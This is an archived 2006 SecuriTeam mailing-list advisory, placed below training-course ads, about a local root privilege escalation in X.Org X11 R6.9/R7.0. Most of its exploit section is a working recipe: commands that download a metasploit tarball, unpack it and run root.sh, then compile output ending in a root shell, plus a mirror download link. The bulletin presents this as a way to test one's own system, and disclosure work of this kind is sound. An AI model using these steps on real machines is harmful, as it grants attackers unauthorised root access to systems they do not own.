Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[EXPL] X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation (Ex

Subject: [EXPL] X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation (Exploit)
Date: 22 Mar 2006 09:12:50 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation (Exploit)
------------------------------------------------------------------------


SUMMARY

"The X.Org Foundation provides an open source implementation of the X 
Window System." A privileges  
<http://www.securiteam.com/unixfocus/5YP0M0AI0U.html> escalation with in 
X.org allows attackers to gain root privileges, the following exploit code 
can be used to test your system for the mentioned vulnerability.

DETAILS

Vulnerable Systems:
 * xorg-server version 1.0.0, as shipped with X11R7.0
 * xorg-server version X11R7.0rc
 * xorg-server version X11R6.9.0
 * xorg-server version X11R6.9.0rc
 * xorg-server version X11R6.8.2
 * xorg-server version X11R6.8.2rc

Exploit:
# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable.

# The rest is H D Moore from metasploit

Two second exploit, but if anyone is lazy:

$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f   exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

# backup: http://www.milw0rm.com/sploits/xmodulepath.tgz

# milw0rm.com [2006-03-20]


ADDITIONAL INFORMATION

The information has been provided by  <mailto:hdm@metasploit.com> H D 
Moore.
The original article can be found at:  
<http://www.milw0rm.org/exploits/1596> 
http://www.milw0rm.org/exploits/1596



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation (Exploit), SecuriTeam <=